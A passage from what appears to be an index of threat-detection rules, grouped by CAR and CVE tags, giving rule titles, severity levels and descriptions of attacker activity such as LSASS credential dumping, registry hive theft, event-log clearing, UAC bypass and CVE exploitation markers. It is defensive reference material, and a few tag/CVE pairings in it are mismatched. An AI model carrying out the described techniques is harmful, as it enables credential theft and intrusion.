    Description: RDP login with localhost source address may be a tunnelled login
  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln - Level: high
    Description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep
  • Potential RDP Exploit CVE-2019-0708 - Level: medium
    Description: Detect suspicious error on protocol RDP, potential CVE-2019-0708
  • Outbound RDP Connections Over Non-Standard Tools - Level: high
    Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
  • RDP Over Reverse SSH Tunnel - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
  • RDP to HTTP or HTTPS Target Ports - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
  • Terminal Service Process Spawn - Level: high
    Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
  • Suspicious RDP Redirect Using TSCON - Level: high
    Description: Detects a suspicious RDP session redirect using tscon.exe
car.2016_03_001 9
Show Rules (9)
  • HackTool - SharpLdapWhoami Execution - Level: high
    Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
  • Network Reconnaissance Activity - Level: high
    Description: Detects a set of suspicious network related commands often used in recon stages
  • Renamed Whoami Execution - Level: critical
    Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
  • WhoAmI as Parameter - Level: high
    Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
  • Enumerate All Information With Whoami.EXE - Level: medium
    Description: Detects the execution of "whoami.exe" with the "/all" flag
  • Whoami Utility Execution - Level: low
    Description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
  • Whoami.EXE Execution With Output Option - Level: medium
    Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
  • Whoami.EXE Execution Anomaly - Level: medium
    Description: Detects the execution of whoami.exe with suspicious parent processes.
  • Reconnaissance Activity Using BuiltIn Commands - Level: medium
    Description: Detects execution of a set of builtin commands often used in recon stages by different attack groups
car.2019_04_001 8
Show Rules (8)
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • CMSTP Execution Process Creation - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • Potentially Suspicious Event Viewer Child Process - Level: high
    Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
  • HackTool - Empire PowerShell UAC Bypass - Level: critical
    Description: Detects some Empire PowerShell UAC bypass methods
  • CMSTP UAC Bypass via COM Object Access - Level: high
    Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
  • CMSTP Execution Registry Event - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • UAC Bypass via Event Viewer - Level: high
    Description: Detects UAC bypass method using Windows event viewer
  • UAC Bypass via Sdclt - Level: high
    Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
car.2013_05_009 7
Show Rules (7)
  • Renamed PaExec Execution - Level: medium
    Description: Detects execution of renamed paexec via imphash and executable product string
  • Renamed PsExec - Level: high
    Description: Detects the execution of a renamed PsExec often used by attackers or malware
  • Renamed PowerShell - Level: high
    Description: Detects the execution of a renamed PowerShell often used by attackers or malware
  • Potential Defense Evasion Via Rename Of Highly Relevant Binaries - Level: high
    Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
  • Process Memory Dump Via Comsvcs.DLL - Level: high
    Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
  • Potential LSASS Process Dump Via Procdump - Level: high
    Description: Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.
  • Ps.exe Renamed SysInternals Tool - Level: high
    Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
car.2016_04_002 7
Show Rules (7)
  • Security Eventlog Cleared - Level: high
    Description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
  • Eventlog Cleared - Level: medium
    Description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
  • Important Windows Eventlog Cleared - Level: high
    Description: Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by "wevtutil cl" command execution
  • Disable of ETW Trace - Powershell - Level: high
    Description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions
  • ETW Trace Evasion Activity - Level: high
    Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
  • Suspicious Eventlog Clearing or Configuration Change Activity - Level: high
    Description: Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique were seen used by threat actors and ransomware strains in order to evade defenses.
  • NotPetya Ransomware Activity - Level: critical
    Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
car.2013_09_005 7
Show Rules (7)
  • Suspicious Service Installation - Level: high
    Description: Detects suspicious service installation commands
  • Uncommon Service Installation Image Path - Level: medium
    Description: Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
  • Service Installation in Suspicious Folder - Level: medium
    Description: Detects service installation in suspicious folder appdata
  • Service Installation with Suspicious Folder Pattern - Level: high
    Description: Detects service installation with suspicious folder patterns
  • Suspicious Service Installation Script - Level: high
    Description: Detects suspicious service installation scripts
  • Malicious Service Installations - Level: critical
    Description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
  • Rare Service Installations - Level: low
    Description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services
car.2013_08_001 7
Show Rules (7)
  • HackTool - Default PowerSploit/Empire Scheduled Task Creation - Level: high
    Description: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.
  • Scheduled Task Creation Via Schtasks.EXE - Level: low
    Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
  • Potential BearLPE Exploitation - Level: high
    Description: Detects potential exploitation of the BearLPE exploit using Task Scheduler ".job" import arbitrary DACL write\par
  • Scheduled Task Deletion - Level: low
    Description: Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME
  • Scheduled Task Created - FileCreation - Level: low
    Description: Detects the creation of a scheduled task via file creation.
  • Scheduled Task Created - Registry - Level: low
    Description: Detects the creation of a scheduled task via Registry keys.
  • Rare Schtasks Creations - Level: low
    Description: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
cve.2023_36884 6
Show Rules (6)
  • Potential CVE-2023-36884 Exploitation Dropped File - Level: medium
    Description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation Pattern - Level: critical
    Description: Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2303-36884 URL Request Pattern Traffic - Level: high
    Description: Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCOM potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - File Downloads - Level: medium
    Description: Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - URL Marker - Level: high
    Description: Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884
  • Potential CVE-2023-36884 Exploitation - Share Access - Level: high
    Description: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884
car.2019_04_004 5
Show Rules (5)
  • Credential Dumping Tools Accessing LSASS Memory - Level: high
    Description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools
  • Mimikatz Detection LSASS Access - Level: high
    Description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ)
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
  • Potentially Suspicious AccessMask Requested From LSASS - Level: medium
    Description: Detects process handle on LSASS process with certain access mask
  • Mimikatz In-Memory - Level: medium
    Description: Detects certain DLL loads when Mimikatz gets executed
cve.2021_34527 4
Show Rules (4)
  • Possible PrintNightmare Print Driver Install - Level: medium
    Description: Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.
  • Windows Spooler Service Suspicious Binary Load - Level: informational
    Description: Detect DLL Load from Spooler Service backup folder
  • PrinterNightmare Mimikatz Driver Name - Level: critical
    Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
  • CVE-2021-1675 Print Spooler Exploitation IPC Access - Level: critical
    Description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
cve.2023_23397 4
Show Rules (4)
  • Suspicious WebDav Client Execution Via Rundll32.EXE - Level: high
    Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
  • Outlook Task/Note Reminder Received - Level: low
    Description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.
  • CVE-2023-23397 Exploitation Attempt - Level: critical
    Description: Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
  • Potential CVE-2023-23397 Exploitation Attempt - SMB - Level: medium
    Description: Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.
cve.2023_22518 4
Show Rules (4)
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) - Level: high
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) - Level: medium
    Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
cve.2023_4966 4
Show Rules (4)
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: high
    Description: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs.
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs.
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver - Level: high
    Description: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string.
cve.2022_26134 3
Show Rules (3)
  • Potential OGNL Injection Exploitation In JVM Based Application - Level: high
    Description: Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the reason for some high profile RCE's such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)
  • Atlassian Confluence CVE-2022-26134 - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
  • Java Payload Strings - Level: high
    Description: Detects possible Java payloads in web access logs
cve.2021_26084 3
Show Rules (3)
  • Java Payload Strings - Level: high
    Description: Detects possible Java payloads in web access logs
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084
  • Potential CVE-2021-26084 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-260841 a Confluence RCE using OGNL injection
car.2013_07_001 3
Show Rules (3)
  • Mimikatz Use - Level: high
    Description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
  • Copying Sensitive Files with Credential Data - Level: high
    Description: Files with well-known filenames (sensitive files with credential data) copying
  • Dumping of Sensitive Hives Via Reg.EXE - Level: high
    Description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
stp.1u 3
Show Rules (3)
  • Operator Bloopers Cobalt Strike Commands - Level: high
    Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • Scheduled Task Creation Via Schtasks.EXE - Level: low
    Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
car.2016_03_002 3
Show Rules (3)
  • New Process Created Via Wmic.EXE - Level: medium
    Description: Detects new process creation using WMIC via the "process call create" flag
  • Hardware Model Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
  • Potential Product Class Reconnaissance Via Wmic.EXE - Level: medium
    Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
cve.2020_0688 3
Show Rules (3)
  • CVE-2020-0688 Exploitation Attempt - Level: high
    Description: Detects CVE-2020-0688 Exploitation attempts
  • CVE-2020-0688 Exchange Exploitation via Web Log - Level: critical
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
  • CVE-2020-0688 Exploitation via Eventlog - Level: high
    Description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
cve.2023_34362 3
Show Rules (3)
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity - Level: high
    Description: Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE - Level: medium
    Description: Detects the execution of "csc.exe" via "w3wp.exe" process. MOVEit affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability. Exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting Opportunity Events from IIS dynamically compiling binaries via the csc.exe on behalf of the MOVEit application, especially since May 27th should be investigated.
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request - Level: high
    Description: Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362
cve.2023_36874 3
Show Rules (3)
  • Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location - Level: medium
    Description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874.
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation - Level: high
    Description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874.
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution - Level: high
    Description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874
cve.2024_1709 3
Show Rules (3)
  • ScreenConnect User Database Modification - Level: medium
    Description: Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
  • CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation - Level: critical
    Description: Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.
  • ScreenConnect User Database Modification - Security - Level: medium
    Description: This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server. This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
cve.2021.21551 2
Show Rules (2)
  • Vulnerable Dell BIOS Update Driver Load - Level: high
    Description: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551
  • Vulnerable Lenovo Driver Load - Level: high
    Description: Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges
cve.2019_14287 2
Show Rules (2)
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin - Level: critical
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
  • Sudo Privilege Escalation CVE-2019-14287 - Level: high
    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
cve.2022_33891 2
Show Rules (2)
  • Apache Spark Shell Command Injection - ProcessCreation - Level: high
    Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
  • Apache Spark Shell Command Injection - Weblogs - Level: high
    Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective
car.2013_05_004 2
Show Rules (2)
  • Remote Task Creation via ATSVC Named Pipe - Zeek - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
  • Remote Task Creation via ATSVC Named Pipe - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
car.2015_04_001 2
Show Rules (2)
  • Remote Task Creation via ATSVC Named Pipe - Zeek - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
  • Remote Task Creation via ATSVC Named Pipe - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with ATSVC namedpipe
cve.2021_42278 2
Show Rules (2)
  • Win Susp Computer Name Containing Samtheadmin - Level: critical
    Description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
  • Potential CVE-2021-42278 Exploitation Attempt - Level: medium
    Description: The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
cve.2021_42287 2
Show Rules (2)
  • Win Susp Computer Name Containing Samtheadmin - Level: critical
    Description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
  • Suspicious Computer Account Name Change CVE-2021-42287 - Level: high
    Description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
cve.2022_30190 2
Show Rules (2)
  • File Creation In Suspicious Directory By Msdt.EXE - Level: high
    Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE - Level: high
    Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
car.2014_11_003 2
Show Rules (2)
  • Sticky Key Like Backdoor Execution - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
  • Sticky Key Like Backdoor Usage - Registry - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
car.2014_11_008 2
Show Rules (2)
  • Sticky Key Like Backdoor Execution - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
  • Sticky Key Like Backdoor Usage - Registry - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
cve.2022_41120 2
Show Rules (2)
  • HackTool - SysmonEOP Execution - Level: critical
    Description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
  • Suspicious Sysmon as Execution Parent - Level: high
    Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
car.2013_05_002 2
Show Rules (2)
  • Suspicious Binary In User Directory Spawned From Office Application - Level: high
    Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
  • Suspicious Process Start Locations - Level: medium
    Description: Detects suspicious process run from unusual locations
cve.2021_35211 2
Show Rules (2)
  • Suspicious Serv-U Process Pattern - Level: high
    Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322 - Level: critical
    Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
cve.2020_1472 2
Show Rules (2)
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC - Level: high
    Description: Detects the execution of the commonly used ZeroLogon PoC executable.
  • Potential Zerologon (CVE-2020-1472) Exploitation - Level: high
    Description: Detects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472)
cve.2020_1048 2
Show Rules (2)
  • Suspicious PrinterPorts Creation (CVE-2020-1048) - Level: high
    Description: Detects new commands that add new printer port which point to suspicious file
  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry - Level: high
    Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
cve.2021_33771 2
Show Rules (2)
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
cve.2021_31979 2
Show Rules (2)
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
cve.2021_21978 2
Show Rules (2)
  • CVE-2021-21978 Exploitation Attempt - Level: high
    Description: Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978
  • Exploitation of CVE-2021-26814 in Wazuh - Level: high
    Description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
cve.2021_26858 2
Show Rules (2)
  • CVE-2021-26858 Exchange Exploitation - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content
  • ProxyLogon Reset Virtual Directories Based On IIS Log - Level: critical
    Description: When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories
cve.2021_40444 2
Show Rules (2)
  • Potential CVE-2021-40444 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations
  • Potential Exploitation Attempt From Office Application - Level: high
    Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
cve.2021_40539 2
Show Rules (2)
  • ADSelfService Exploitation - Level: high
    Description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit - Level: critical
    Description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
cve.2021_44228 2
Show Rules (2)
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon - Level: high
    Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j.
  • Log4j RCE CVE-2021-44228 in Fields - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
cve.2023_38331 2
Show Rules (2)
  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File - Level: high
    Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process - Level: high
    Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
cve.2023_40477 2
Show Rules (2)
  • CVE-2023-40477 Potential Exploitation - .REV File Creation - Level: low
    Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash - Level: medium
    Description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477
cve.2023_43621 2
Show Rules (2)
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy - Level: high
    Description: Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web - Level: high
    Description: Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.
cve.2023_46214 2
Show Rules (2)
  • Potential CVE-2023-46214 Exploitation Attempt - Level: medium
    Description: Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code - Level: high
    Description: Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
cve.2023_46747 2
Show Rules (2)
  • CVE-2023-46747 Exploitation Activity - Proxy - Level: high
    Description: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-46747 Exploitation Activity - Webserver - Level: high
    Description: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
cve.2024_1708 2
Show Rules (2)
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Level: medium
    Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security - Level: critical
    Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
cve.2024_3400 2
Show Rules (2)
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation - Level: medium
    Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - Level: high
    Description: Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
cve.2024_37085 2
Show Rules (2)
  • Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group - Level: high
    Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins". This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
  • Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity - Level: high
